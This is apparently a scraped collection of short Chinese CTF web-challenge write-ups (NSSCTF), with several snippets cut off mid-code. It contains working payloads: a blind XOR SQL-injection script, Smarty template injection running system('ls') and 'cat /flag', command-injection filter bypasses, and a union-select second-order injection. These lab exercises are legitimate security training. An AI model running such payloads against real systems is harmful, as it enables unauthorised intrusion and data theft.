Van

fuzz发现很多都被过滤了。 发现是空格过滤了，用括号试试，再试试异或，OK exp 拿之前的异或脚本改一改 # 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1import requestsimport timeurl = "http://node2.anna.nssctf.cn:28140/index.php"payload = "1^(ascii(substr((select(flag)from(flag)),{},1))>{})^1"i = 0mess_ok = "glzjin wants a girlfriend."# mess_false = "not"out = ""while True: i += 1 begin = 32 end = 128 tmp = (begin + end) // 2 while begin < end: ...

题目打开有xff头（但nss我试了没有），试着改一改，发现可能是注入点，然后进行注入即可。 看到有操作是直接{{system('cat /flag')}} 不过考点应该是smarty的 {$smarty.version}Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令。 如 {php}phpinfo();{/php}但是3.1.30已废除{php}标签Smarty的{if}条件判断和PHP的if 非常相似，只是增加了一些特性。全部的PHP条件表达式和函数都可以在if内使用，如*||*,or,&&,and,is_array(), 等等。{if phpinfo()}{/if}{if system('ls')}{/if}{if show_sou ...

web 基本做出来了，除了SQL还有session伪造还有无事发生（社工，找GitHub链接，然后在无事发生那个文件里面找） 贴一些链接，感觉比赛作为入门挺好的 https://blog.csdn.net/Aluxian_/article/details/130657256

代码 # encoding:utf-8import re, random, uuid, urllibfrom flask import Flask, session, requestapp = Flask(__name__)random.seed(uuid.getnode())app.config['SECRET_KEY'] = str(random.random()*233)app.debug = True@app.route('/')def index(): session['username'] = 'www-data' return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'@app.route('/read')def read(): try: url = request.args.g ...

https://blog.csdn.net/weixin_42744595/article/details/130567542 https://mp.weixin.qq.com/s?__biz=MzkzNTQzNTQzMQ==&mid=2247484307&idx=1&sn=f32529f761a8b6675cd98235a4ba45d3&chksm=c2af4e5bf5d8c74d90a7a52881261a540fcea6dcea4e92059043eeb3192eca8f2a35d1fec050&mpshare=1&scene=23&srcid=0511mEgG3O1QQeAUBR2dMAMn&sharer_sharetime=1683815293967&sharer_shareid=cfad11f42ce92eed4932225e44fcc1c0#rd

webPINGOK：& url编码BAN:;|`/^~><?$badrequest #数组也不行l\sls&curl 127.0.0.1 一点延迟回显都没有可以直接访问flag.php赛后居然发现是nl flag.php 无语了 pop简单的链子 Fastdestruct 破坏掉就行了，把最后一个花括号删了。https://www.jianshu.com/p/38606134fdd6 May_be<?phphighlight_file(__FILE__);$a = $_GET['a'];if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $a)) { if (!preg_match("/sess|ion|head|ers|file|na|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i",$a)){ ...

SQL注入

搜一下发现 index.php?mode=getconfig得到版本version":"7.7然后继续 访问admin.php根据提示说五位弱密码，那么直接猜12345 进入 根据网上的步骤来就行了 我是用文件上传加编辑代码的 执行操作的时候甚至还火绒报毒了，还得把火绒关了才行。 然后代码重写之后，修改会不刷新结果。那么去上传文件的地方重新点修改然后直接保存，再刷新主页就得到结果了。（差不多这样） https://blog.csdn.net/scrawman/article/details/122619270 https://blog.csdn.net/LYJ20010728/article/details/120005727 https://blog.csdn.net/solitudi/article/details/118873773 https://blog.csdn.net/qq_38154820/article/details/106329727 https://blog.csdn.net/LYJ20010728/article/details/1200 ...

黑名单 很多黑名单字母数字都被ban了好像 文件上传无字母数字 https://blog.csdn.net/qq_43431158/article/details/108089364 https://www.cnblogs.com/Jleixin/p/13289150.html

二次注入 测试是单引号闭合＋一咧显示 username=1’ union select flag from flag#&password=1